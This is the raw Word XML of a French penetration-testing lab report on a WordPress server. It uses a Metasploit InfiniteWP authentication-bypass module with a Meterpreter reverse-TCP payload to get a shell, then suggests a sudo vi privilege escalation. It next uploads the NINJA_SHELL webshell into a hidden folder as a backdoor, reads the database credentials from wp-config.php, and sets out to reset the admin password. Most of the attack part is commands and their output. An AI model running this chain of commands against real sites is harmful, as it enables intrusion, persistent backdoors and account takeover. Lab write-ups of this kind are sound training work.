    <w:p w14:paraId="415B72BF" w14:textId="50B0D19D" w:rsidR="002A3E26" w:rsidRPr="002A3E26" w:rsidRDefault="002A3E26" w:rsidP="002A3E26">
      <w:r w:rsidRPr="002A3E26">
        <w:lastRenderedPageBreak/>
        <w:t>InfiniteWP – Client est un p</w:t>
      </w:r>
      <w:r>
        <w:t>lugin installé sur notre Wordpress dans une ancienne version. Nous pouvons donc essayer d’exploiter cette faille afin de nous connecter au serveur :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE6E15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msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/unix/webapp/wp_infinitewp_auth_bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1E057" w14:textId="77777777" w:rsid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>[*] Using configured payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC9263" w14:textId="291ECAF8" w:rsidR="00D650CC" w:rsidRPr="00D650CC" w:rsidRDefault="00D650CC" w:rsidP="00D650CC">
      <w:r w:rsidRPr="00D650CC">
        <w:t>La commande option permet d</w:t>
      </w:r>
      <w:r>
        <w:t>e lister toutes les options disponibles avant de tenter s’exploiter la faille</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679832BC" w14:textId="77777777" w:rsidR="00543EDB" w:rsidRPr="00543EDB" w:rsidRDefault="00543EDB" w:rsidP="00543EDB">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543EDB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E30A92" w14:textId="0106251F" w:rsidR="00543EDB" w:rsidRPr="00C67BBF" w:rsidRDefault="00C67BBF" w:rsidP="00543EDB">
      <w:r w:rsidRPr="00C67BBF">
        <w:t>Définition de l’IP distante s</w:t>
      </w:r>
      <w:r>
        <w:t>ur laquelle nous lançons l’attaque :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0854CBEB" w14:textId="77777777" w:rsidR="00421E45" w:rsidRPr="00421E45" w:rsidRDefault="00421E45" w:rsidP="00421E45">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set RHOSTS 10.44.19.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FB28A" w14:textId="77777777" w:rsidR="00421E45" w:rsidRPr="00EC596F" w:rsidRDefault="00421E45" w:rsidP="00421E45">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC596F">
        <w:t>RHOSTS =&gt; 10.44.19.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D230E" w14:textId="02F5B234" w:rsidR="00C67BBF" w:rsidRPr="00C67BBF" w:rsidRDefault="00C67BBF" w:rsidP="00C67BBF">
      <w:r w:rsidRPr="00C67BBF">
        <w:t>Définition du port sur l</w:t>
      </w:r>
      <w:r>
        <w:t>equel nous lançons l’attaque :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33112C81" w14:textId="77777777" w:rsidR="00421E45" w:rsidRPr="00421E45" w:rsidRDefault="00421E45" w:rsidP="00421E45">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421E45">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set RPORT 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E51892" w14:textId="77777777" w:rsidR="00421E45" w:rsidRPr="00EC596F" w:rsidRDefault="00421E45" w:rsidP="00421E45">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC596F">
        <w:t>RPORT =&gt; 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D3BC3" w14:textId="2727E9AD" w:rsidR="00C67BBF" w:rsidRPr="00C67BBF" w:rsidRDefault="00C67BBF" w:rsidP="00C67BBF">
      <w:r w:rsidRPr="00C67BBF">
        <w:t xml:space="preserve">Définition de l’IP </w:t>
      </w:r>
      <w:r>
        <w:t>d’écoute :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC6C5C" w14:textId="5D7A6AD1" w:rsidR="00421E45" w:rsidRPr="00C67BBF" w:rsidRDefault="00421E45" w:rsidP="00421E45">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67BBF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set LHOST 10.44.19.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC6BBD" w14:textId="3005DEAA" w:rsidR="00421E45" w:rsidRPr="00C67BBF" w:rsidRDefault="00421E45" w:rsidP="00421E45">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r w:rsidRPr="00C67BBF">
        <w:t>LHOST =&gt; 10.44.19.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AAE929" w14:textId="592BC24C" w:rsidR="00C67BBF" w:rsidRPr="00C67BBF" w:rsidRDefault="002A3E26" w:rsidP="00C67BBF">
      <w:r>
        <w:t>Lancement de l’exploitation de la faille après avoir donné les informations sur le serveur :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65D1A6" w14:textId="77777777" w:rsidR="00457309" w:rsidRPr="00EC596F" w:rsidRDefault="00457309" w:rsidP="00457309">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC596F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(unix/webapp/wp_infinitewp_auth_bypass) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC596F">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F288F18" w14:textId="77777777" w:rsidR="00457309" w:rsidRPr="00EC596F" w:rsidRDefault="00457309" w:rsidP="00457309">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720651A0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 xml:space="preserve">[*] Started reverse TCP handler on 10.44.19.200:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77765305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Running automatic check ("set AutoCheck false" to disable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BD63D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+] The target appears to be vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B369989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Bypassing auth for admin at http://10.44.19.200:8081/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ACD929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+] Successfully obtained cookie for admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13E32C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+] Successfully logged in as admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FECA54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Retrieving original contents of /wp-content/plugins/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A4CCF5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+] Successfully retrieved original contents of /wp-content/plugins/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157C80B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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA21D32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// Silence is golden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946E0C7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Overwriting /wp-content/plugins/index.php with payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A156C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+] Successfully overwrote /wp-content/plugins/index.php with payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84B5FD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Requesting payload at /wp-content/plugins/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A467804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Restoring original contents of /wp-content/plugins/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C76E169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t>[*] Sending stage (39927 bytes) to 172.18.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B23637" w14:textId="77777777" w:rsidR="00457309" w:rsidRPr="00457309" w:rsidRDefault="00457309" w:rsidP="00457309">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457309">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[+] Current contents of /wp-content/plugins/index.php match original!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A3A61" w14:textId="450B999C" w:rsidR="00170C0A" w:rsidRPr="00D54590" w:rsidRDefault="00457309" w:rsidP="00D54590">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457309">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:r w:rsidRPr="004553CB">
        <w:rPr>
          <w:highlight w:val="blue"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Meterpreter session 1 opened (10.44.19.200:4444 -&gt; 172.18.0.4:50894) at 2023-05-04 13:28:56 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A82ED00" w14:textId="73324A25" w:rsidR="00457309" w:rsidRPr="00EC596F" w:rsidRDefault="00170C0A" w:rsidP="00457309">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC596F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nous sommes maintenant </w:t>
      </w:r>
      <w:r w:rsidR="009C43A5" w:rsidRPr="00EC596F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connectés</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC596F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> à notre Wordpress :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC8E28F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 xml:space="preserve">meterpreter &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A86E3B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Process 229 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33997E96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Channel 1 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A2054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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6F635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akismet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB011DE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better-wp-security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAA377C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hello.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F4E9C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index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C17AA36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iwp-client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E9B6E8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simple-file-list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A9B39" w14:textId="77777777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social-warfare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1DBB5" w14:textId="725FBD7C" w:rsidR="004553CB" w:rsidRPr="004553CB" w:rsidRDefault="004553CB" w:rsidP="004553CB">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004553CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wp-advanced-search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20798A2C" w14:textId="16168E4A" w:rsidR="00170C0A" w:rsidRPr="00EC596F" w:rsidRDefault="004553CB" w:rsidP="004553CB">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC596F">
        <w:t>wp-file-upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23175DCC" w14:textId="390E2DC2" w:rsidR="004553CB" w:rsidRDefault="00DE3172" w:rsidP="004553CB">
      <w:r w:rsidRPr="00DE3172">
        <w:t>Il est maintenant possible de p</w:t>
      </w:r>
      <w:r>
        <w:t>asser n’importe quelle commande du shell. Ici nous sommes connectés avec l’utilisateur www-data. Il serait bien de trouver une faille afin de passer en tant qu’utilisateur root (peut-être avec la faille sur vi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706D980" w14:textId="328B57F9" w:rsidR="00DE3172" w:rsidRDefault="00DE3172" w:rsidP="004553CB">
      <w:r>
        <w:t>Exécuter vi en sudo puis lancer un !shell et sortir de vi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687AEEF1" w14:textId="77777777" w:rsidR="00ED7C7D" w:rsidRDefault="00ED7C7D" w:rsidP="004553CB"/>
    <w:p w14:paraId="44A529E2" w14:textId="4CBAD250" w:rsidR="00D54590" w:rsidRDefault="00D54590" w:rsidP="00D54590">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc134106308"/>
      <w:r>
        <w:t>5.2. Mise en place d’un WebShell afin d’avoir une backdoor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1F346B32" w14:textId="6072B1F9" w:rsidR="00ED7C7D" w:rsidRDefault="00ED7C7D" w:rsidP="004553CB">
      <w:r>
        <w:t xml:space="preserve">La première chose </w:t>
      </w:r>
      <w:r w:rsidR="004D7424">
        <w:t>à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0029767F">
        <w:t xml:space="preserve">essayer </w:t>
      </w:r>
      <w:r>
        <w:t>quand nous arrivons dans un système va être d’y installer un webshell afin de se mettre en place une backdoor</w:t>
      </w:r>
      <w:r w:rsidR="0029767F">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382320F2" w14:textId="2C97714F" w:rsidR="0029767F" w:rsidRDefault="0029767F" w:rsidP="004553CB">
      <w:r>
        <w:t xml:space="preserve">Installation d’un ninja shell : </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00196611">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github.com/Yudas1337/NINJA_SHELL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EA6EE3" w14:textId="78E8D3D3" w:rsidR="00BA05B8" w:rsidRDefault="00BA05B8" w:rsidP="004553CB">
      <w:r>
        <w:t>Le but est de le télécharger afin d’avoir le code du shell et ensuite il faut utiliser la commande upload sur le Wordpress piraté afin d’y placer les fichiers de shell :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C00F6" w14:textId="74711ECC" w:rsidR="0029767F" w:rsidRPr="00BA05B8" w:rsidRDefault="00BA05B8" w:rsidP="004553CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA05B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Sur la machine Linux en local : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219B79F" w14:textId="26A95EB4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root@opendaylight:/home/ubuntu/cyber# git clone https://github.com/Yudas1337/NINJA_SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437D507" w14:textId="2716188E" w:rsid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root@opendaylight:/home/ubuntu/cyber# cd NINJA_SHELL/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D764BF8" w14:textId="77777777" w:rsidR="002B5954" w:rsidRPr="00EC596F" w:rsidRDefault="002B5954" w:rsidP="00BA05B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CF0D61" w14:textId="77777777" w:rsidR="002B5954" w:rsidRPr="00EC596F" w:rsidRDefault="002B5954" w:rsidP="00BA05B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58606068" w14:textId="2E4D269C" w:rsidR="00BA05B8" w:rsidRPr="00BA05B8" w:rsidRDefault="00BA05B8" w:rsidP="00BA05B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r la machine Wordpress piratée :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29AB66" w14:textId="17133EE4" w:rsidR="00BA05B8" w:rsidRDefault="00BA05B8" w:rsidP="00BA05B8">
      <w:r w:rsidRPr="00BA05B8">
        <w:t>Maintenant il faut importer l</w:t>
      </w:r>
      <w:r>
        <w:t>es fichiers du webshell dans le serveur Wordpress :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D0FAB" w14:textId="245981DC" w:rsidR="00BA05B8" w:rsidRDefault="00BA05B8" w:rsidP="00BA05B8">
      <w:r>
        <w:t>Je me place dans le dossier /var/www/html/ et je crée un dossier « ai » afin de cacher mes fichiers :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568B297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meterpreter &gt; mkdir ai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F5645" w14:textId="2C983B06" w:rsid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Creating directory: ai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB2765C" w14:textId="18CE6932" w:rsidR="00BA05B8" w:rsidRPr="00BA05B8" w:rsidRDefault="00BA05B8" w:rsidP="00BA05B8">
      <w:r w:rsidRPr="00BA05B8">
        <w:t>Maintenant je peux copier m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es fichiers sur le serveur Wordpress (le chemin où je me trouve est celui où j’étais juste avant d’ouvrir la msfconsole et me connecter sur le serveur : </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA05B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/home/ubuntu/cyber</w:t>
      </w:r>
      <w:r>
        <w:t>) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD82DE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meterpreter &gt; upload ./NINJA_SHELL/ ./</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9241DC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ing  : /home/ubuntu/cyber/NINJA_SHELL/i.woff2 -&gt; .//i.woff2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF56C23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ed   : /home/ubuntu/cyber/NINJA_SHELL/i.woff2 -&gt; .//i.woff2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842650B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ing  : /home/ubuntu/cyber/NINJA_SHELL/main.css -&gt; .//main.css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B00CE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ed   : /home/ubuntu/cyber/NINJA_SHELL/main.css -&gt; .//main.css</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACAC64F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ing  : /home/ubuntu/cyber/NINJA_SHELL/jquery.php -&gt; .//jquery.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0026BF10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ed   : /home/ubuntu/cyber/NINJA_SHELL/jquery.php -&gt; .//jquery.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697C6DC0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ing  : /home/ubuntu/cyber/NINJA_SHELL/i.woff -&gt; .//i.woff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B4DA5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ed   : /home/ubuntu/cyber/NINJA_SHELL/i.woff -&gt; .//i.woff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E9493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ing  : /home/ubuntu/cyber/NINJA_SHELL/README.md -&gt; .//README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120698E2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ed   : /home/ubuntu/cyber/NINJA_SHELL/README.md -&gt; .//README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223C289" w14:textId="77777777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ing  : /home/ubuntu/cyber/NINJA_SHELL/LICENSE -&gt; .//LICENSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690AD1D7" w14:textId="50EAD098" w:rsidR="00BA05B8" w:rsidRPr="00BA05B8" w:rsidRDefault="00BA05B8" w:rsidP="00BA05B8">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA05B8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] uploaded   : /home/ubuntu/cyber/NINJA_SHELL/LICENSE -&gt; .//LICENSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F867A71" w14:textId="721C4070" w:rsidR="0029767F" w:rsidRDefault="00BA05B8" w:rsidP="004553CB">
      <w:r>
        <w:t>Une fois les fichiers copiés il est possible d’aller se connecter sur le Webshell (le mot de passe est celui situé dans le fichier jquery.php</w:t>
      </w:r>
      <w:r w:rsidR="00144461">
        <w:t xml:space="preserve"> qui est codé en MD5) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B7373" w14:textId="52015233" w:rsidR="00144461" w:rsidRDefault="00144461" w:rsidP="004553CB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17BB4359" wp14:editId="6DDC6C8C">
            <wp:extent cx="5759450" cy="2437130"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="24259593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593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258" w14:textId="5E36D7BD" w:rsidR="008263C5" w:rsidRDefault="00144461" w:rsidP="004553CB">
      <w:r>
        <w:t xml:space="preserve">Lien de connexion au WebShell : </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="008263C5" w:rsidRPr="00196611">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://IP_Wordpress/ai/jquery.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53F35A10" w14:textId="3C382DEC" w:rsidR="00671ECE" w:rsidRDefault="008263C5" w:rsidP="008263C5">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc134106309"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.3. Changement du mot de passe du compte administrateur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="786FE5B5" w14:textId="6BAB20CB" w:rsidR="008263C5" w:rsidRDefault="008263C5" w:rsidP="008263C5">
      <w:r>
        <w:t xml:space="preserve">L’objectif ici va t’être de modifier le mot de passe du compte administrateur et le remplacer par </w:t>
      </w:r>
      <w:r w:rsidRPr="008263C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>« hacker »</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>en utilisant notre WebShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B6CD1" w14:textId="26CEED8C" w:rsidR="008263C5" w:rsidRDefault="00FF3302" w:rsidP="008263C5">
      <w:r>
        <w:t>Pour se faire il faut trouver les identifiants de l’utilisateur admin afin de se connecter à la BDD</w:t>
      </w:r>
      <w:r w:rsidR="00254A06">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7062F" w14:textId="4DA12ED8" w:rsidR="00254A06" w:rsidRDefault="00FF3302" w:rsidP="008263C5">
      <w:r>
        <w:t>Le fichier de configuration /var/www/html/wp-config.php contient les identifiants de l’utilisateur</w:t>
      </w:r>
      <w:r w:rsidR="00254A06">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0012677A">
        <w:t xml:space="preserve">de la BDD </w:t>
      </w:r>
      <w:r w:rsidR="00254A06">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F95C1" w14:textId="4ED71B3D" w:rsidR="00254A06" w:rsidRDefault="00254A06" w:rsidP="008263C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D3CC2F6" wp14:editId="237979C1">
            <wp:extent cx="2279650" cy="1359791"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="226414666" name="Image 1" descr="Une image contenant texte, Police, blanc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14666" name="Image 1" descr="Une image contenant texte, Police, blanc, algè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8716" cy="13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627F" w14:textId="3D1E569B" w:rsidR="00FF3302" w:rsidRDefault="00FF3302" w:rsidP="008263C5">
      <w:r>
        <w:t>Nous pouvons maintenant essayer de rechercher une page d’accès à un phpmyadmin afin de se connecter à la BDD et modifier le mot de passe</w:t>
      </w:r>
      <w:r w:rsidR="00254A06">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CE3C7" w14:textId="394CE8E3" w:rsidR="00254A06" w:rsidRDefault="00254A06" w:rsidP="008263C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="568F21E2" wp14:editId="4C13B7A3">
            <wp:extent cx="3657600" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="201034869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8690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4DC" w14:textId="73DB32C8" w:rsidR="00254A06" w:rsidRDefault="00254A06" w:rsidP="008263C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3806B0" wp14:editId="6F65544B">
            <wp:extent cx="3686175" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1255070583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70583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DB87" w14:textId="77777777" w:rsidR="0012677A" w:rsidRDefault="0012677A" w:rsidP="008263C5"/>
    <w:p w14:paraId="7551CEEB" w14:textId="77777777" w:rsidR="0012677A" w:rsidRDefault="0012677A" w:rsidP="008263C5"/>
    <w:p w14:paraId="56BD222F" w14:textId="77777777" w:rsidR="0012677A" w:rsidRDefault="0012677A" w:rsidP="008263C5"/>
    <w:p w14:paraId="02ACE839" w14:textId="77777777" w:rsidR="0012677A" w:rsidRDefault="0012677A" w:rsidP="008263C5"/>
    <w:p w14:paraId="722EE910" w14:textId="77777777" w:rsidR="0012677A" w:rsidRDefault="0012677A" w:rsidP="008263C5"/>
    <w:p w14:paraId="60BEFC28" w14:textId="3E558728" w:rsidR="00254A06" w:rsidRDefault="0012677A" w:rsidP="008263C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Et maintenant trouver la table qui contient les informations des utilisateurs :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3492A4DB" w14:textId="026B037C" w:rsidR="0012677A" w:rsidRDefault="0012677A" w:rsidP="008263C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E714ED0" wp14:editId="21E0F76D">
            <wp:extent cx="5759450" cy="1496060"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
